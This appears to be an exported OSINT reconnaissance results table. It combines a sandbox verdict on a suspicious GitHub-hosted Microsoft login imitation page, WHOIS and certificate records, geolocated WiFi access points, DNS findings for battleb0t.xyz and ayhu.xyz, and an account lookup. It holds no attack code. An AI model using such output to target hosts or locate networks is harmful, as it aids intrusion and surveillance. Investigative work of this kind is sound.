| 2023-05-12 02:48:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://sweetushivi17.github.io/Microsoft-login-page/', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'http://sweetushivi17.github.io/microsoft-login-page/', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://sweetushivi17.github.io/microsoft-login-page', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://sweetushivi17.github.io/Microsoft-login-page/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b84_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b84_ConnHashTable<2948>_HashTable_Mutex"\n "IsoScope_b84_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2948"\n "IsoScope_b84_IESQMMUTEX_0_303"\n "IsoScope_b84_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b84_IE_EarlyTabStart_0xc60_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': 
u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "185.199.110.153:443"\n "104.16.86.20:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"sweetushivi17.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "sweetushivi17.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'".bi-twitter::before { content: "\\f5ef"; }" (Indicator: "twitter")\n ".bi-youtube::before { content: "\\f62b"; }" (Indicator: "youtube")\n ".bi-paypal::before { content: "\\f662"; }" (Indicator: "paypal")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"logo_1_.svg" has 
type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "gradient_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 3000x2000 components 3"- [targetUID: N/A]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "bootstrap-icons_1_.woff" has type "Web Open Font Format TrueType length 164360 version 1.0"- [targetUID: N/A]\n "bootstrap-icons_1_.css" has type "ASCII text"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002948]\n "~DF53903A5E404B1FCB.TMP" has type "data"- Location: [%TEMP%\\~DF53903A5E404B1FCB.TMP]- [targetUID: 00000000-00002948]\n "~DF05E154F480DFB66A.TMP" has type "data"- Location: [%TEMP%\\~DF05E154F480DFB66A.TMP]- [targetUID: 00000000-00002948]\n "~DFA5701C5187025040.TMP" has type "data"- Location: [%TEMP%\\~DFA5701C5187025040.TMP]- [targetUID: 00000000-00002948]\n "RecoveryStore._A6C704DF-DD69-11ED-A7BD-080027F574BD_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_A6C704E1-DD69-11ED-A7BD-080027F574BD_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_AF26B50C-DD69-11ED-A7BD-080027F574BD_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "style_1_.css" has type "ASCII text"- [targetUID: N/A]\n "Microsoft-login-page_2_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "3P2T1AIT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3P2T1AIT.txt]- [targetUID: 00000000-00003404]\n "84GBFS1L.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\84GBFS1L.txt]- 
[targetUID: 00000000-00002948]\n "BI76777G.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BI76777G.txt]- [targetUID: 00000000-00002948]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /Microsoft-login-page/"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://sweetushivi17.github.io/Microsoft-login-page/"\n Pattern match: "http://sweetushivi17.github.io"\n Pattern match: "https://getbootstrap.com/"\n Pattern match: "https://github.com/twbs/bootstrap/blob/main/LICENSE"\n Pattern match: "SUIDMmicrosoft.com/9216393460646431027691283476884631027574*MUID137D942D0AA16C820DDA86DB0B256DBFmicrosoft.com/1025406709568031106045283492509631027574*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "https://icons.getbootstrap.com/"\n Pattern match: "https://github.com/twbs/icons/blob/main/LICENSE.md"\n Pattern match: "SUIDMmicrosoft.com/9216393460646431027691283476884631027574*MUID137D942D0AA16C820DDA86DB0B256DBFmicrosoft.com/1025406709568031106045283492509631027574*_EDGE_V1microsoft.com/9216406709568031106045283508134631027574*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: 
"https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css"\n Pattern match: "https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.4/font/bootstrap-icons.css"\n Pattern match: "isdomainmigratedtruewww.msn.com/102566554790431063801283883134631027574*"\n Pattern match: "www.msn.com/"\n Pattern match: "MUID2B12DF6F2BEE647803B1CD992AA265D9msn.com/1025406709568031106045283883134631027574*"\n Pattern match: "SUIDMmicrosoft.com/9216393460646431027691283476884631027574*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "MUIDB137D942D0AA16C820DDA86DB0B256DBFieonline.microsoft.com/9216406709568031106045283492509631027574*"\n Heuristic match: "sweetushivi17.github.io"\n Heuristic match: "cdn.jsdelivr.net"\n Heuristic match: "GET /Microsoft-login-page/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: sweetushivi17.git"\n Pattern match: "https://sweetushivi17.github.io/Microsoft-login-page/Accept-Language"\n Heuristic match: "weetushivi17.github.io"\n Pattern match: "sweetushivi17.github.io/Microsoft-login-page/"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwl"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=70599"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145837"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkID=57190"\n 
Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145765"\n Heuristic match: "Example: computer.fabrikam.com"\n Pattern match: "vista.gallery.microsoft.com/vista/SideShow.aspx"\n Pattern match: "http://www.icra.org/vocabulary/"\n Pattern match: "wmploc.dll/Offline_Buy.htm\'res://wmploc.dll/Offline_MediaGuide.htm*res://wmploc.dll/Offline_Subscriptions.htm"\n Pattern match: "http://go.micros | 185.199.110.153 |
| 2023-05-12 03:42:55 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@world4you.com | Domain Name: INFLANY.COM
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: http://www.world4you.com
Updated Date: 2023-04-13T07:19:32Z
Creation Date: 2022-04-12T14:21:11Z
Registry Expiry Date: 2024-04-12T14:21:11Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.WORLD4YOU.AT
Name Server: NS2.WORLD4YOU.AT
DNSSEC: signedDelegation
DNSSEC DS Data: 36937 13 2 B736B70844AD09A9498F06982C97724A0BF4ACA8DE5244B40607B538A5323618
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:42:43Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: inflany.com
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: https://www.world4you.com
Updated Date: 2023-04-13T21:36:05Z
Creation Date: 2022-04-12T14:21:11Z
Registrar Registration Expiration Date: 2024-04-12T14:21:12Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email: abuse@world4you.com
Registrar Abuse Contact Phone: +43.73293035
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization:
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AT
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AT
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: https://whoispro.domain-robot.org/whois/inflany.com
Name Server: ns1.world4you.at
Name Server: ns2.world4you.at
DNSSEC: signedDelegation
URL of the ICANN WHOIS Data Problem Reporting System: https://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:42:54Z <<<
For more information on Whois status codes, please visit https://www.icann.org/epp
# World4You Internet Services GmbH WHOIS service.
#
# The data in the World4You WHOIS database is provided to you by
# World4You Internet Services GmbH for informational purposes only and
# may be used to assist persons in obtaining information about or
# related to a domain name registration record.
# Except for agreed Internet operational purposes (such as register or
# modify existing registrations), no part of this information may be
# stored, reproduced or transmitted by any means.
# World4You does not guarantee its accuracy.
#
# By submitting a WHOIS query, you agree that you will use this data
# only for lawful purposes and that, under no circumstances, you will
# use this data to
# (1) allow, enable, or otherwise support the transmission of mass
# unsolicited, commercial advertising or solicitations via E-mail
# (spam); or
# (2) enable high volume, automated, electronic processes that apply
# to World4You (or its computer systems).
# World4You reserves the right to modify these terms at any time.
# By submitting this query, you agree to abide by this policy.
# www.world4you.com - Your hostingprovider.at
|
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NH-NEW (Net ID: 00:01:21:31:EF:1C) | 37.7642, -122.3993 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Turkey | Bursa, Bursa Province, 16250, Turkey, Asia |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | mike1 (Net ID: 00:01:71:0A:05:C5) | 52.3759, 4.8975 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | redwood (Net ID: 00:01:38:85:C1:F8) | 37.7813933,-122.3918002 |
| 2023-05-12 02:55:21 | Netblock Membership | No | Censys | 6 | 0 | 3 | 0 | None | 207.154.224.0/20 | 207.154.228.169 |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpanel.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', 
u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', 
u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b6:39:33:af:de:1e:32:f3:fc:2e:76:dc:bc:08:51:86:10
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 25 01:39:25 2023 GMT
Not After : May 26 01:39:24 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 25 02:39:25.268 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:87:F6:3C:B2:E0:C2:7B:F4:59:32:49:
FF:84:EE:E1:AC:5D:A1:7E:84:DE:B8:AC:92:3B:97:98:
6D:C7:11:07:D0:02:21:00:8E:A1:79:1C:1F:BD:8E:15:
DE:AB:97:FE:40:E1:D9:C2:1C:3E:55:3D:39:DF:88:B8:
3E:30:32:EA:CF:51:A0:F3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Feb 25 02:39:25.238 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:C0:CA:4A:3A:01:79:C5:F7:4D:18:6C:
70:E8:74:A4:FC:31:5E:46:FF:DB:BC:55:79:1C:6B:D3:
2A:77:33:92:7D:02:21:00:B3:6C:B3:CD:94:6E:40:07:
54:43:CE:33:E0:3F:C2:49:48:DC:19:23:44:E4:9D:8B:
7E:E1:7F:46:CE:18:EF:B6
Signature Algorithm: sha256WithRSAEncryption
b2:e3:a8:2c:e5:ba:7b:3e:8e:fb:de:05:c9:db:df:10:e1:3a:
4a:d4:c8:e9:16:76:31:31:b8:1d:87:e3:42:15:5c:d9:01:d1:
e3:21:14:96:0d:03:d6:ab:2a:bb:6e:da:97:10:fe:b1:03:48:
ab:7e:6d:7b:96:6d:e0:3a:5a:e9:94:2e:83:ae:3f:a8:a5:8c:
25:3a:a9:c5:1d:63:8a:0d:55:4d:54:c8:3a:17:d4:72:72:76:
78:9d:29:2a:3b:de:f5:0a:4c:d8:44:82:1f:1a:29:cc:5c:2c:
bf:7e:db:71:7c:50:e3:91:fe:95:3f:d3:87:5f:30:37:48:ec:
63:b6:a1:ac:33:ac:63:05:b2:8f:6d:ee:9e:2e:ac:50:59:e9:
41:46:d2:71:65:05:17:42:d9:3e:21:9d:d7:90:39:a6:8f:2d:
e8:4a:d4:ff:6d:9e:32:c6:82:05:8f:a4:b5:74:b4:70:df:28:
4b:50:c8:1b:36:1a:ae:cf:7b:ab:92:23:e6:77:97:f2:47:a4:
b0:52:f2:9d:cf:be:68:a2:8a:f2:2f:f0:66:0b:d3:34:2a:c7:
8a:35:c4:1c:33:2d:e5:90:de:56:a7:97:86:7c:97:c9:45:8f:
99:61:22:00:3d:aa:b2:87:0d:35:bb:4c:f3:f8:1c:f8:99:c1:
e8:d1:30:c6
| battleb0t.xyz |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nuke.battleb0t.xyz | [{"url": "https://nuke.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nuke.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:11:15 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2a06:98c1:3121::1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | HackerOne (Category: tech)
https://hackerone.com/login | login |
